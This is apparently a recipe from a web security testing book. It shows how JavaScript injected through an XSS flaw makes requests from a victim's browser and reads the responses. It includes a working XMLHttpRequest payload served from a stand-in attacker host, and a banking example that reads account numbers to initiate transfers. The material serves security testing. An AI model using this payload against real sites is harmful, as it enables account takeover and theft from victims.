One of the most powerful tools available to an attacker building an XSS exploit is being able to generate requests to the target website from the victim's browser and being able to read the responses. This recipe will discuss how you can use JavaScript to make requests to the target website from the victim's browser
Solution
Create a JavaScript file containing the script in Example 1 and make it accessible at http://attacker.example.org/make_http_request.js (wherever your attack server is), and then insert it into the vulnerable page using the technique described in Example 2.
Example 1. JavaScript for making HTTP request
var xmlhttpreq;
if(window.XMLHttpRequest){
/* Most browsers use a XMLHttpRequest object for making
AJAX Requests */
xmlhttpreq=new XMLHttpRequest();
}
else if(window.ActiveXObject){
/* Internet Explorer uses ActiveXObject for making
AJAX Requests */
xmlhttpreq=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttpreq.open("GET","http://www.example.com/do_something",false);
if (window.XMLHttpRequest) {
xmlhttpreq.send(null);
} else {
xmlhttpreq.send();
}
/* The server's response is stored in the variable 'response' */
var response = xmlhttpreq.responseText;
Discussion
Example 1 will submit a request to the target website from the victim's browser, and the response will be stored in the variable response where it can be parsed using JavaScript and the information contained in it can either be sent to the attacker as in the previous two recipes or used in subsequent requests made to the target website. For example, if an attacker finds an XSS vulnerability in an online banking website, the attacker could write JavaScript code to submit a request to the site, parse the account numbers from the response, and use them to initiate a transfer to the attacker's bank account.This attack works because the victim's browser submits the user's session cookie to the vulnerable website along with each request to the website. The vulnerable website authenticates each request by verifying the user's session cookie and cannot differentiate between requests initiated by the legitimate user and requests generated using the attacker's JavaScript code.This attack only works when the target website is vulnerable to XSS. Although it is possible to submit requests to any website via CSRF attacks, the server's responses and leveraging the information in the responses is only possible when the target is vulnerable to XSS. This is because web browsers enforce a "same origin policy" that only allows AJAX requests to be made to the website that the user is visiting. Using this technique, the attacker's script can mimic any actions that the legitimate user can perform.